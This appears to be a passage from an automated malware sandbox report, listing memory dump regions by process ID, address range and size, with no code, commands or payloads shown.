                                                                                                                                                                                                                                                                  • memory/2780-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/2780-193-0x00000000031B0000-0x00000000031BE000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    56KB

                                                                                                                                                                                                                                                                  • memory/2780-189-0x0000000003170000-0x00000000031AC000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                                                  • memory/2780-185-0x00000000007D1000-0x00000000007D3000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                  • memory/2844-119-0x000002B4B6F30000-0x000002B4B6F31000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/2844-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/3084-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/3672-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/3872-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/3928-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/3928-171-0x0000000000400000-0x0000000000443000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    268KB

                                                                                                                                                                                                                                                                  • memory/4084-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4108-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4116-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4116-180-0x00000000012A0000-0x00000000012A2000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                  • memory/4116-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4276-160-0x0000000000B00000-0x0000000000B01000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4276-164-0x000000001B810000-0x000000001B812000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                  • memory/4276-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4300-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4336-334-0x0000000002840000-0x0000000002842000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                  • memory/4336-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4348-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4352-335-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                  • memory/4352-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4392-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4436-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4512-221-0x00007FF675504060-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4512-254-0x0000023621BD0000-0x0000023621C37000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    412KB

                                                                                                                                                                                                                                                                  • memory/4512-326-0x0000023624000000-0x0000023624106000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                                  • memory/4576-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4620-194-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    356KB

                                                                                                                                                                                                                                                                  • memory/4620-195-0x00000000004017B1-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4620-201-0x0000000001340000-0x0000000001388000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                                                                  • memory/4620-205-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    356KB

                                                                                                                                                                                                                                                                  • memory/4712-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4784-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4784-244-0x00000000044A0000-0x00000000044DA000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                                                                  • memory/4784-248-0x0000000004620000-0x0000000004676000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    344KB

                                                                                                                                                                                                                                                                  • memory/4792-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4792-327-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                                  • memory/4804-199-0x0000000000401480-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4804-198-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                                                                  • memory/4812-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4868-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4920-300-0x0000000000880000-0x0000000000881000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4920-147-0x00000000026D0000-0x000000000286C000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                                  • memory/4920-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4920-290-0x0000000000A60000-0x0000000000B0E000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    696KB

                                                                                                                                                                                                                                                                  • memory/4920-308-0x0000000000870000-0x000000000088B000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                  • memory/4936-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4944-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4960-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/4960-336-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-344-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-352-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-350-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-353-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-349-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-347-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-343-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-342-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-338-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-339-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-340-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/4960-341-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/5372-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5380-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5432-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5496-292-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5496-298-0x0000000001140000-0x0000000001142000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                  • memory/5548-348-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                  • memory/5548-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5704-307-0x00000000009B0000-0x00000000009BD000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    52KB

                                                                                                                                                                                                                                                                  • memory/5704-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5884-333-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                  • memory/5884-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/5988-280-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6064-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6064-291-0x0000000002A90000-0x0000000002A92000-memory.dmp
                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                  • memory/6064-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6136-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6232-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6244-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6296-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6344-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6416-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6584-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6620-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6680-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/6696-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/7052-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/7084-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/7112-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                  • memory/7136-365-0x0000000000000000-mapping.dmp